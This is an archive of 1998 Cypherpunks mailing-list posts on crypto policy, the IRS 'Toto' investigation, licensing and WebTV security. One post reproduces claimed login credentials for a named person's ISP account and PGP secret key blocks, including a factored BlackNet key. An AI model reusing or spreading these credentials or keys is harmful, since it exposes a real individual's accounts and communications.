>    pre-Penny Black system of cash-on-delivery, where postmen demanded
>    exorbitant fees from recipients. Outwitting the Post Office involved
>    gleaning important information from, say, the way the address was
>    written, then refusing the letter on the grounds that it was too
>    expensive.
>    
>     The poet Coleridge tells the story of the most rudimentary sort of
>    frank, witnessed at an inn in the north of England. A postman offered
>    a letter to the barmaid and demanded a shilling. Sighing
>    melodramatically, she gave back the letter, protesting that she was
>    too poor to pay for it. Coleridge, ever the gentleman, insisted on
>    forking out the shilling, only to be shown afterwards that the
>    envelope was empty. The letter's message was in fact contained in a
>    number of subtle hieroglyphics alongside the address.

[text deleted]

>     The Post Office cottoned on to such shenanigans, but proof of
>    fraudulent activity was next to impossible. They did, however, crack a
>    number of basic codes, and administered fines accordingly. Secret
>    messages embedded within apparent instructions to the postman, such as
>    "With speed" or "Postman, be you honest and true" were well known, as
>    was the practice of highlighting certain words on a newspaper
>    (newspapers were delivered free of charge) to convey a simple idea.
>    Underlining the name of a Whig politician commonly meant "I am well",
>    while doing the same thing with a Tory meant the opposite.

[text deleted]


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <leif@imho.net>
Date: Thu, 15 Oct 1998 00:32:33 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: DNA
In-Reply-To: <000401bdf77a$fe720d00$932580d0@xasper8d>
Message-ID: <3624C73B.F5A648E1@imho.net>
MIME-Version: 1.0
Content-Type: text/plain



X wrote:
> 
> DNA of identical siblings is identical?  I guess that makes sense, since
> we're really split after conception...  so explain why my brother has smooth
> hands and fingers with almost no prints (lucky bastard!) and mine look like
> mother teresa's face... (probably more now than before, eh?)
> 
> X
> 

What about the difference in twins being that one can be from two ovum
and two sperm??  Did you ever think of that??  Thus a brother and sister
that are twins?  Maybe you are one of said twins two eggs two sperm...

Is if fraternal VS paternal twins?  I forget...
or maternal VS paternal??   Maybe paternal two sperms maternal the egg
split twice... High School Biology was so long ago and I do computers
now, not biology or medicine.


				- lhe



			- lhe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@pobox.com>
Date: Thu, 15 Oct 1998 02:28:36 +0800
To: Adam Back <cypherpunks@cyberpass.net
Subject: Re: more Toto keys... so what's it all mean
In-Reply-To: <199810141529.QAA32138@server.eternity.org>
Message-ID: <v03102802b24a93869e11@[17.202.40.158]>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back <aba@dcs.ex.ac.uk> summarizes the Toto-files by noting
>
>As to what it means -- it means that one or more others could have
>been the author of the message the IRS claim Carl Johnson wrote.  Heck
>anyone could sign posts with that key now.
>

This suggests that a cynical, paranoid, person could create a
"deniable" signature key by doing what "Toto" did:

1. Choosing a key length that a "very competent attacker" (i.e.
   a TLA), and only a "very competent attacker", could factor.
2. Signing a message and leaving the public key that signed
   that message on a public site.

Now, when you are accused of signing a message, you can raise
a "reasonable doubt" defence by claiming that the TLA may have
reconstructed the private key that signed the message in question.

Martin Minow
minow@pobox.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 14 Oct 1998 17:56:23 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199810140934.LAA00392@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Hello,

>The IRS and United States Attorney's office are looking for assistance in
>a criminal investigation involving threatening messages which were posted
>to the Cypherpunks mailing list.  This e-mail address was noted to be one
>of those which receives the Cypherpunks list.  I would appreciate it if
>you would contact me to discuss whether you would be willing to assist us
>in this matter, and what records or information you have relating to the
>Cypherpunks list.  You can contact me at this e-mail address or at (503)
>326-2787.


Sorry, but I am not aware of any threating messages posted to this list. Of course I can see how your organization may consider calls by the citizens for a return to a Constitutional government a "threat".

I woun't be calling you but I will be calling my congressman and senator in the morning reaffirming my support for a flat tax and the abolishment of the IRS.

Have a nice day,

I am TOTOCUS!!   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 15 Oct 1998 00:11:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IRS wants cypherpunks archives
Message-ID: <199810141538.LAA29509@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Adam Back <aba@dcs.ex.ac.uk>
   >
   >   Jeff, and fellow agents seem to be interested in cypherpunks archives
   >   (as evidenced by asking Jim Choate who operates one of the mailing
   >   list nodes, but who does _not_ offer archived list traffic).  Jeff is
   >   Cc'd on this post to be helpful (who says cypherpunks aren't helpful
   >   -- you only have to ask).
   >
   >   This archive seems to be operational:
   >
   >   	http://www.inet-one.com/cypherpunks/

And less than 100 lines of client-side programming (I use 'expect')
will retrieve the entire archive.
---guy

   Watch them make a grunt retrieve it all manually.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Oct 1998 19:36:35 +0800
To: rms@gnu.org
Subject: overlapping aims -- cypherpunks/FSF (Re: Two? ways people could use your code)
In-Reply-To: <199810140046.UAA06980@psilocin.gnu.org>
Message-ID: <199810141057.LAA28762@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Richard Stallman writes:
> There are actually three classes of possible projects that might use
> code you have written:
> 
> * Those who want to make a free program.
> * Those who want to make a proprietary program.
> * Those who don't have strong views about the matter.
> 
> So let's look at each of these three cases, considering two available
> choices (copylefting, or not copylefting), and how the decision
> affects the goals of encouraging use of encryption, discouraging back
> doors, and encouraging users' freedom.

I see this as a two separate, overlapping aims thing.

Aim 1, get lots of crypto out there, quality a secondary issue.

Motivation: try to ensure enough people use and know about crypto, so
that enough people understand how objectionable it is when governments
try to outlaw crypto.  Of course encourage use of strong crypto,
published, unpatented algorithms, and published source code where this
doesn't interfere with deployment.

Aim 2, try to encourage people to publish all source code.

Motivation: to give end-users more flexibility, and more freedom to do
what they want and change as they want the software they use.  I use
almost exclusively linux myself by choice.

> * Often at companies, and sometimes at universities, people are dead
>   set on making a proprietary program.  This program may be capable of
>   doing a job, but its users will not have freedom, and they will have
>   to take it on faith that there are no backdoors.
> 
>   Copylefting your code says this project cannot use it.  Most likely,
>   the project will spend some extra money to write their own code, and
>   the outcome for the public will be much the same.  They might do a
>   worse job, or a better job.  There's some chance they would not do
>   the project; whether that is a loss for the public is not clear.  

Most deployed crypto is commercial, most used software is commercial.
(Insert proprietary instead of commercial if this makes it clearer
what I mean).

Therefore it seems to me that successes in getting crypto put in
commercial software which would not otherwise be there are important.

Your average linux/unix/GNU hacker is well above average in technical
competence, and can look after himself.  He can get the source for
pgp, check it to some extent, and understand the issues.  He is not
the target for the deployment.

The target for deployment is the mass market end-user (think windows95
users).  At present it is a statement of reality that most end-users
are using windows95.

>   It could mean less use of encryption; but if you also care about
>   avoiding secret back doors, and about users' freedom, you won't
>   see this as an unambiguous loss.

Surreptitious company inserted unpublished back doors are rare I
think, much more likely is crypto-incompetence leading to
unintentional weakness.  Cypherpunks also have had some successes in
cracking weak systems as a way to encourage the vendors to fix the
problems.  Encouraging open source, and published protocols,
especially for crypto components is a good idea as it encourages peer
review.

> * Often at universities, and sometimes at companies, people decide to
>   write a program but don't think about whether to make it free
>   software.  They may not care, they may dislike thinking about the
>   issue, they may simply not understand that there is an issue.
> 
>   In these cases, they will probably judge your code by its features,
>   not by its distribution terms.  If they want to use your code, and
>   your terms say that's permitted only if their program is free,
>   they'll say, "Ok, I'll make it free, and use your code."
> 
>   In this kind of case, using copyleft will produce a benefit: more
>   freedom for the end user, who can check, rather than trust, that
>   there are no back doors in the program.

Agree.

> Conclusion: if you care *only* about more use of encryption, and
> *absolutely not* about secret back doors or users' freedom, then you
> would find it a better strategy not to copyleft.

The secret doors we are concerned to fight against are being
engineered by governments.  Usually they are out in the open (clipper,
KRAP, etc).

> But if you care about encouraging use of encryption, about
> discouraging back doors, and about freedom for software users,
> copyleft (such as the GNU GPL) is a good way of promoting all of these
> goals together.

GNU GPL not a bad way to further these two goals simultaneously, but I
think BSD (or I think you say that X11 license is better) is better
for the purpose.

Or GNU LGPL (Library GPL) I think is a good compromise position: it
allows use in proprietary software without requiring the rest of the
code to be GNU GPLed, and it encourages free access to the crypto
portion (if we are talking about crypto libraries and tools).

Would you be interested in publishing GNUPG, and other GNU crypto
utilities and libraries under GNU LGPL?  And adopting this for crypto
code as a general GNU strategy?  There are other libraries, so it
should qualify.  (Tom Zerucha wrote a OpenPGP implementation using
SSLeay, and I think said he would public domain his software).

Adam
-- 
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 15 Oct 1998 00:38:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Aaron Debunks Crypto Myths
Message-ID: <199810141614.MAA00413@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: John Young <jya@pipeline.com>
   >
   >   Crypto emissary David Aaron gave a speech today in
   >   Germany boosting US encryption policy for privacy and
   >   commerce. Says it's an insult to claim US intelligence 
   >   agencies want backdoor access and other untrue myths:
   >
   >      http://jya.com/aaron101398.htm

A prime example of DoubleThink, since Key Recovery == backdoor access.

#   http://jya.com/aaron101398.htm
#
#   Clearly, a balance must be struck between the needs of businesses and
#   consumers and the protection of society as a whole. What is the
#   answer? We believe the answer lies in cryptographic systems that
#   provide trustworthy security services along with lawful access. By
#   lawful access, I refer to a range of technologies designed to permit
#   the plain text recovery of encrypted data and communications under a
                   ^^^^^^^^
#   court order or other lawful means that safeguards civil liberties.

In other words, they believe in cryptographic systems with backdoor access.

The NSA testified to Congress concerning lawful access:

: The Puzzle Palace 
:     Inside the National Security Agency,
:     America's most secret intelligence organization
: Author James Bamford, 1983 revision, ISBN 0-14-00.6748-5
:
: P381-382: NSA Director General Allen testified to Congress that there is no
: statute that prevents the NSA from interception of domestic communications.
: Asked whether he was concerned about the legality of expanding greatly its
: targeting of American citizens, the NSA replied: "Legality? That particular
: aspect didn't enter into the discussions."

The government's idea of "lawful access" is "anywhere, anytime".


#   http://jya.com/aaron101398.htm
#
#   We are not wedded to any single technology approach. Key management
#   infrastructures, key recovery and other recoverable products that
#   provide lawful access are some of the ways to achieve a reasonable
#   balance. We believe that seeking industry-led, market-based solutions
#   is the best approach to helping law enforcement.

Oh dey do do dey?

: From owner-firewalls-outgoing@GreatCircle.COM Wed May 14 18:54:15 1997
: Received: from osiris (osiris.nso.org [207.30.58.40]) by ra.nso.org
:           (post.office MTA v1.9.3 ID# 0-13592) with SMTP id AAA322
:           for <firewalls@GreatCircle.COM>; Wed, 14 May 1997 12:56:13 -0400
: Date: Wed, 14 May 1997 12:58:46 -0400
: To: firewalls@GreatCircle.COM
: From: research@isr.net (Research Unit I)
: Subject: Re: Encryption Outside US
:     
: I was part of that OECD Expert Group, and believe I may shine at least
: some light on what exactly was said and happened at the meetings.
:
: The main conflict during all sessions was the demand of the US to be
: able to decrypt anything, anywhere at any time versus the European
: focus: we want to have the choice - with an open end - to maintain
: own surveillance.  The US demand would have caused an immediate
: ability to tap into what the European intelligence community believes to
: be its sole and exclusive territory. In fact the Europeans were not at all
: pleased with the US view points of controlling ALL crypto. Germany and
: France vigorously refused to work with the US on this issue.
:
: ... the Australian and UK views that felt some obligation
: from the 1947 UKUSA treaty (dealing with interchange of intelligence). 
:
: Bertil Fortrie
: Internet Security Review


The US Government insists on the capability

   "to decrypt anything, anywhere at any time"

he said.

Gosh, that doesn't sound like they believe "market-based solutions"
are the best approach, does it?

*   http://epic.org/crypto/ban/fbi_dox/impact_text.gif
* 
*   SECRET FBI report
*
*                   NEED FOR A NATIONAL POLICY
* 
*   A national policy embodied in legislation is needed which insures
*   that cryptography use in the United States should be forced to be
*   crackable by law enforcement, so such communications can be monitored
*   with real-time decryption. 
* 
*   All cryptography that cannot meet this standard should be prohibited.

No it don't, do it?


: *   "Above the Law"
: *   ISBN 0-684-80699-1, 1996
: *   by David Burnham
: *
: *   The suspicion that the government might one day try to outlaw any
: *   encryption device which did not provide easy government access was
: *   reinforced by comments made by FBI Director Freeh at a 1994 Washington
: *   conference on cryptography. "The objective for us is to get those
: *   conversations...wherever they are, whatever they are", he said in
: *   response to a question.
: *
: *   Freeh indicated that if five years from now the FBI had solved the
: *   access problem but was only hearing encrypted messages, further
: *   legislation might be required.

Anywhere, anytime.
---guy

   "Easy access".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 15 Oct 1998 03:54:29 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: DNA
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A5F@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



 
> But what about identical sib's.  They all
> have exactly the same DNA!

Or a clone ;). 

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 15 Oct 1998 00:57:14 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gary Burnore vs. Earth (Was: Value of Annon. Remailers)
Message-ID: <199810141634.MAA00719@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Missouri FreeNet Administration <sysadmin@mfn.org>
   >
   >   Obviously, as defenders of this man's right to post material offensive
   >   to Burnore, we too came under attack.

One man's attack is another's defense.

   >   	The point here is that what little survives about this lunatic child
   >   molester (he has even successfully had his North Carolina Sex Offender record
   >   removed!),...

Gee, why don't you ask North Carolina why, in writing?

   >   Yes, I know, at least half of you are sitting here going "now why did they
   >   bother us with that?".  The answer is we feel VERY strongly that if not for
   >   what [little] we were able to find as a result of A/R's, we would never have
   >   been able to figure this clown out at all.  And loco though he may be, he is
   >   also a *prodigious* pain in the ass,...

Again, ying/yang.

Let us know when you have an original thought.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SDN <sdn@divcom.slimy.com>
Date: Thu, 15 Oct 1998 04:16:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: FYI: More on WebTV security
In-Reply-To: <v03102802b24934307011@[204.1.1.65]>
Message-ID: <19981014124309.A2210@divcom.slimy.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Oct 14, 1998 at 03:23:45AM -0700, Bill Stewart wrote:
> At 06:32 PM 10/13/98 -0700, SDN wrote:
> 
> >More relevant to the list, the threat model for the WebTV service/box is
> >primarily concerned about loss of user data, forgotten passwords, and
> >unsecured data over the public internet.  It's not worried about privacy
> >from WebTV insiders.
> >As a result, all user data is stored on the service, traffic to and from the
> >box is encrypted, and data isn't hidden from the customer care people.
> 
> If it's not secure against insiders, then it's not only not secure against cops,

I'd say it's definitely not secure against law enforcement.  That's probably
the primary reason why the boxes got export approval with 128-bit crypto.
It's just so much easier to ask the service operators what a user has been
up to, check the logs, and go...

That's why I said that the threat model wasn't something a cypherpunk would
be happy with.  There just isn't any protection against an attacker who
looks legitimite to Microsoft.

> it's also not secure against crackers, unless Microsoft hsa let the
> WebTV folks do a very good job of security.

This is less clear.  The service predates the buyout, and it hasn't (yet)
migrated to NT.  The people who run and maintain it are very competent
(at least the ones I know personally), but anyone can make mistakes,
espescially under the pressures of a startup environment.

Jon Leonard

Again, the above are my opinions.  WebTV's opinions may be entirely different.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <leif@imho.net>
Date: Thu, 15 Oct 1998 02:36:43 +0800
Subject: Re: Use encryption to foil spooks' data harvesting, says US state dept
In-Reply-To: <199810141617.SAA07987@replay.com>
Message-ID: <3624E51A.C5074D7B@imho.net>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> http://ds.state.gov/documents/protect.doc
>
> transmission of competitive information.
> 
> Many telecommunications transmissions will contain "key words", used to
>

HUM SOunds like the idea of the 'auto record'  I say a keyword on the
phone and wham I am being recorded to see *IF* I am some sort of
terrorist trying to overthrow the government, get stuff that I should
not have like a fully functional missile and what not.  

Do you all believe this?  I do. I can not say why but I do.
(Actually I could say why but it is two long stories.)

Do you believe this is done in phone calls in the US based on the
telephone switch doing the monitoring and it monitors ALL calls not just
those that go over seas???  I believe so...  See my above statement.

Have you been recorded before??? I believe I have....  WHY???  Well, if
you ask that then you do not belong on this group!


			- lhe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Oct 1998 20:32:33 +0800
To: tcmay@got.net
Subject: Re: ATTN: BlackNet, sog's keys 4 sale
In-Reply-To: <v03130307b249d4908a73@[209.66.100.146]>
Message-ID: <199810141153.MAA29777@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Tim May comments on:
> At 6:41 PM -0700 10/13/98, Anonymous wrote:
> >Dear BlackNet,
> >
> >TOTO Enterprises, Bienfait, Saskatchewan hereby offers
> >for sale sog's key under the BlackNet anonymous
> >information market.
> >
> >Payments must be in anonymous ecash delivered to a
> >digital dead drop to be arranged later.
> >
> >Or alternatively, we are willing to take bids in
> >bottles of Scotch delivered to TOTO Key Escrow
> >Services, Box 281, Bienfait, Saskatchewan SOC OMO.

I looked up the key this message was encrypted to on one of the
keyservers by it's keyid -- 0x5A5AD16B.

Look at this:

Type Bits/KeyID    Date       User ID
pub   384/5A5AD16B 1994/02/11 *** KEY REVOKED ***
                              BlackNet<nowhere@cyberspace.nil>

A revoked key, and a rather small key size, this rings a bell, some of
you may recall that some time ago Paul Leyland factored that key.  In
fact I have the hex version of it on my own web pages somewhere as an
example to use with rsa-perl.

A quick altavista on "Leyland BlackNet" turns up the goods [1] below.
(http://www.irdg.com/mep/nni/384broke.txt)

> Hey, I could tell you all that BlackNet was used a while back to
> distribute some of the keys used by The Performance Artist Sometimes
> Known as Toto.

Well this message does indeed seem to contain a key for:

Type Bits/KeyID    Date       User ID
sec  1024/2541C535 1997/11/07 son of gomez <InfoWar@dev.null>

and some claimed passwords for a "carljohn" sympatico account.

Curiouser and curiouser.  Intentional or not?  Intentional I think
from the contents, [2].

Adam


[1]
======================================================================
------- Forwarded Message

From: pcl@sable.ox.ac.uk (Paul Leyland)
Newsgroups: alt.security.pgp,sci.crypt,alt.privacy
Subject: The BlackNet 384-bit PGP key has been BROKEN
Date: 26 Jun 1995 10:09:15 GMT
Organization: Oxford University, England
Lines: 165
Message-ID: <PCL.95Jun26110915@sable.ox.ac.uk>
NNTP-Posting-Host: sable.ox.ac.uk
Xref: mozo.cc.purdue.edu alt.security.pgp:21006 sci.crypt:40008 alt.privacy:225
76

- -----BEGIN PGP SIGNED MESSAGE-----


We announce the first known hostile attack on a PGP public key.

In 1993, Tim May created BlackNet as a proof-of-concept implementation
of an information trading business with cryptographically protected
anonymity of the traders.  He created a 1024-bit key, and invited
potential traders to encrypt their sales pitch and a public key for a
reply with the BlackNet key, posting the result in one or more Usenet
newsgroups.  BlackNet would then reply in the same manner.  The original
proposal went only to a few people and May acknowledged his authorship
shortly afterwards, when his pedagogical point had been made. It was
soon posted to the Cypherpunks list, and from there to Usenet.  Six
months afterwards in February 1994, a 384-bit key was created in the
BlackNet name, and the BlackNet message was spammed to hundreds of
newsgroups by the new key owner, L. Detweiler.

At least one message was posted encrypted in the 384-bit key.  The
encryptor, either by design or by unwitting use of PGP's encrypttoself
option, also encrypted the message to his own key, exposing his identity
to anyone who cared to look him up on the key servers and use finger.

Factoring 384-bit integers is not too difficult these days.  We wanted
to see whether it could be done surreptitiously.  Jim Gillogly picked
the 384-bit BlackNet key as a suitable target, partly because of its
apparent interest and partly because he had saved a copy of the reply.
Paul Leyland took the key to pieces.  The public exponent was found to
be 17 and the public modulus:

3193508200533105601431099148202479609827976414818808019973596061739243\
9454375249389462927646908605384634672078311787

To factor this 116-digit integer, we used the same technology as the
RSA-129 project which completed last year.  That computation was so
large that it was necessary for it to be done in a blaze of publicity in
order to attract enough resources.  Ours, we estimated, would take about
400 mips-years, less than a tenth of the earlier one.  Arjen Lenstra and
Paul Leyland have been factoring integers for years, Lenstra with a
MasPar at Bellcore and Leyland with a dozen or so workstations at Oxford
University.  Alec Muffett has been contributing to factorizations for
almost a year, using forty or so machines outside working hours at Sun
Microsystems UK.  Jim Gillogly threw a couple of machines into the pot,
for a total peak power of around 1300 mips, plus the MasPar.  The
computation began on March 21st on the workstations and continued until
June 23rd.  Lenstra slipped in three weeks runtime on the MasPar between
other factorizations; he also performed the matrix elimination and
emailed the factors (PGP-encrypted) to Leyland. About 50% of the
computation was done by the MasPar.

The factors, as can easily be checked, are:
5339087830436043471661182603767776462059952694953696338283
and
5981374163444491764200506406323036446616491946408786956289

Over in Oxford, a doctored PGP was created.  It could generate only
one secret key, that from two primes hard-coded into it.  The key was
generated and tested on the following message:

> -----BEGIN PGP MESSAGE-----
> Version: 2.6
> 
> hDwDqeLyyFpa0WsBAYCumTBz0ZUBL7wC8pMXS4mBS0m3Cf6PrPer+2A0EQXJZM46
> OvPnqNWz5QK3Lwyg9DeEqAPF5jH/anmgXQEE3RNhybQUcqnOSVGMO2f5hjltI73L
> 8CRXhFzMCgjdCwTRf0Oq61j4RAptUviqhDq/r7J2FpY7GwpL5DxuJ+YrWNep69LK
> Q/CkKxtwvv2f0taly4HCLCcqw59GQ5m++WnOwDQWKG7yUaXJuUG/mJdr/o+ia3y+
> QKyqOesHdSjWoXDpK7F2Cvxf2KpV3+vzbv+TriRyDV+zR/8womdJl6YAAAKtmWO2
> fy0sp/cqr/1ZGQKmfZWz5L0bh1e/sJXJq9PjvPc05ePxZ35XEoRTCqxbq2GPynkH
> YSynfXZY//814TKmdQxPBvkc8Nbi0rc/GYyoAmItDui4mQISYskGkmLieoWDDlpP
> E9tZlb/7Xa22QS53Or6DwU/y226WXQvrWq5OJ+8OhQyEnLWsEdfgFoe1l9aeweX5
> 0ao5lcp098Q4JFfQWoaU9D7kmKvg+AVT44Pv16/nPvihAoC2O14xg7t1U8032ybs
> 4FLpvxyqoF7+oDV/QNw4Evk1ZnxE5+PH2sOf1qCJdljVSd3wGSfUQaDPRx5RH0XC
> SAgYMsIRaytpdoq521tHUZt2BIg7Ii89TfUBrnkenBFAqdZAf+JR1PSB4yaV3YtG
> PCS4lNQkmWx+ItjP0zsHVcAR0TiBcpV0gMY+tx0h40CTkDi2vHiVyswSJr4halsW
> SIixrdi6B0i3f7v7xlOpFI2khza1c/dH8nrF1uPLECeAZ8TQq53ZlyN472KYuTVZ
> 8y5NqyXd672dYEtzsOlUa9YwFKKyGisyDhZmE5wSOg2Pjopvl0WkuZSR/kdxrX/N
> hFdfXRy1Kgkr+vz9abumhcWS5lYCCfVLk/CIgRqHO09nlEJCTb1T/U788Gptr3/d
> 3dj8C/LECdY7fIdkmTgYhXmfv7fQxLWln29Yux0cEpRq2ud8rjYVSuEaTUO9dF4n
> 9oFRsPdbb0TOxaMVFm2hnELzeKAk/poInfEZkN2ZnusxJ4aM1HkBRva+CAMhQHdT
> XMisoNawWEDPwiwu91owIrBevPJNvX155jUTwKNj0UPBwS6TfS5gXl9g+LoBnMWQ
> nbMMMYVXbJVsAeVOlzTSBftpbglx1k7ocDaAJTZ3OCjf0FcKJsa+4Hybc713611c
> WSHV5esfY9k/yw==
> =nLfz
> -----END PGP MESSAGE-----

A successful decryption resulted in:

>   Although I realize blacknet was a hoax of some sort, I'm curious as
> to the reasons behind it and I would like to know the motives of the 
> person who did it, malicious to make fun of cypher punks or simply
> poking fun at cyberspace in general.
>    I'm interested in forming a similar net, not for the buying and 
> selling of information, but for the fun of doing it, who knows what might 
> come about in a network somewhat limited and away from the internet, but
> based on pgp without people flaming, and without the netloons like
> dwetler and sternlight, (I have my doubts about dwetler's actual motives
> in spamming the mailers)
>   SO, hopefully they key I encrypt it to is the actual one, and if not
> hopefully whoever is intercepting this is as interested in creating 
> what I am, why else be eaves dropping??
>   Looking forward to hearing from whoever out there, and
> I hope you're competent enough with unix to extract my pgp key
> from my .plan
> 
> 
> --
> Finger yusuf921@raven.csrv.uidaho.edu for PGP public key 2.6ui
> GJ/GP -d+ H+ g? au0 a- w+++ v+(?)(*) C++++ U++1/2 N++++ M-- -po+ Y+++
> -         t++ 5-- j++ R b+++ D+ B--- e+(*) u** h* r+++ y?  
> 
> 
>

The next step was to create a revocation certificate and send that off
to the PGP key servers.  After all, the key has undoubtedly been
compromised.

The moral of this story is that 384-bit keys can be broken by a small
team of people working in secret and with modest resources.  Lest anyone
object that a MasPar is not a modest resource, we'd re-iterate that it
did only 50% of the work; that we took only three months and that we
used only 50 or so quite ordinary workstations.  We believe that we
could have used at least twice as many machines for at least twice as
long without anyone noticing. The currently minimum recommended key
size, 512 bits, is safe from the likes of us for the time being, but we
should be able to break them within five years or so.  Organizations
with more than "modest resources" can almost certainly break 512-bit
keys in secret right now.

Alec Muffett    alec.muffett@uk.sun.com
Paul Leyland    pcl@oucs.ox.ac.uk
Arjen Lenstra   lenstra@bellcore.com
Jim Gillogly    jim@acm.org

and, of course, BlackNet<nowhere@cyberspace.nil>     8-)

P.S.   The 384-bit BlackNet secret key is:

> -----BEGIN PGP MESSAGE-----
> Version: 2.6.2i
> 
> lQDAAy/ty1QAAAEBgM98haqmu+pqkoqkr95iMmBTNgb+iL54kUJCoBSOrT0Rqsmz
> KHcVaQ+p4vLIWlrRawAFEQABfAw0gFVVGhzZF63Nc8HJin4jAy2WgIOsvST5ne1Y
> CbfyDIZ6siTHUAos8wMBQZ6Q8QDA2b6tiYqrGu6E1+F0DGPSk9MGif5/LKFrAMDz
> 8HXIK1zrEFEDq9/5dUXO2rk1tH+mkAEAv0EE9e5EJn+quL3/YvAg6bKOlM7HgVKq
> JEDDtCBCbGFja05ldDxub3doZXJlQGN5YmVyc3BhY2UubmlsPg==
> =/BEI
> -----END PGP MESSAGE-----


- -----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBL+6HEzt/x7zOdmsfAQGRpQP9FZluArrT5+zsG/R6y/MF7O3d7ArEkVe2
rUQgP7W2NxudAFHTNaL9mqLBDVNW/3PqWIhvHMtrSgG+ZAFBH5bP03tizfOFr+SL
eO1JQgYFey7Wh5J/YCuE0VTlYMZ7bhnoiGIvTYZgxIzVWAYyGmlWKRDjfKz/Pks8
qavbPg6qbPo=
=s12J
- -----END PGP SIGNATURE-----
- --
Paul Leyland <pcl@sable.ox.ac.uk>        | Hanging on in quiet desperation is
Oxford University Computing Services     |     the English way.
13 Banbury Road, Oxford, OX2 6NN, UK     | The time is gone, the song is over.
Tel: +44-1865-273200  Fax: 273275        | Thought I'd something more to say.
Finger pcl@sable.ox.ac.uk for PGP key    |

------- End of forwarded message -------

[2]
======================================================================
ATTN: Jeff Gordon

As a bonus PRIZE for people figuring this out, here's
Toto's sympatico username and password:

username: carljohn
password: 574kxy
SMTP: smtp.sk.sympatico.ca
POP3: mailhost.sk.sympatico.ca
POP3 username: carljohn

  I sent much of my outgoing mail through CJ's system
because he had so many hackers and system intruders
that he was a one-man 'Crowds' unit.

Toto

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzRiaHcAAAEEAPdnnUJRJoktl6tMtRcrV330FvNPok4FvTMOT82V0lIRA7ZQ
jiAcv4Egm8nx6M6dc75eWIIPo4gZOWf5xjZzN8XjD2ytwMNqQnis0RMN9OI8ysk2
I7frJO0FNLikupHf+tUMhDc52qQbOcsVC53GZ8FdwY1zzaX7Dc5WpAclQcU1AAUR
tB9zb24gb2YgZ29tZXogPEluZm9XYXJAZGV2Lm51bGw+iQCVAwUQNGJph85WpAcl
QcU1AQFXPQQA8adaDwM3DnttrJPTjUd9I/fQ6q73Zvp6oLPP3MSon4uEbIVJryPB
wZYfcjXb6Co84XFpaL8shtgP0cHYRZDfQraCwsaJWOm1Lh+ZhZyqHh2oF4QrpOhm
A5YzxYI7SX3GIu/X1XO5vcb+BnJqbl2+RUaHnGqcwwrwxjSc1stGwJ4=
=Yx4A
-----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SECRET KEY BLOCK-----
Version: 2.6.2

lQHgAzRiaHcAAAEEAPdnnUJRJoktl6tMtRcrV330FvNPok4FvTMOT82V0lIRA7ZQ
jiAcv4Egm8nx6M6dc75eWIIPo4gZOWf5xjZzN8XjD2ytwMNqQnis0RMN9OI8ysk2
I7frJO0FNLikupHf+tUMhDc52qQbOcsVC53GZ8FdwY1zzaX7Dc5WpAclQcU1AAUR
AUzSerlWWdq7A/+EGrDs3oHlVDzmPEouO2m1gWLN6erKPgd5tiB7eWECJoiRC9AU
Va2LJLxltmNKIq9znAMeeCpI3nirprYgHMvyASVPrXIo4WXB0NGSyTXSGFbmbfBA
ZhIzgLYfSV7KC9e340B4wqQv/hSGyc9p7/umXgdccspoXM4fIwddYNt0+QIA+XS0
WUPNqr4lyW47GVAhFIuoYsTLi+ZTRRQbS2LAyV2dhGSFVo1Q1HrB/S58dQFTaN85
lRytpZKX2dc+9VC3JgIATZegUu3m2FmRMf7kr0IsRV94q0lxQm4egMPdru6CQGZl
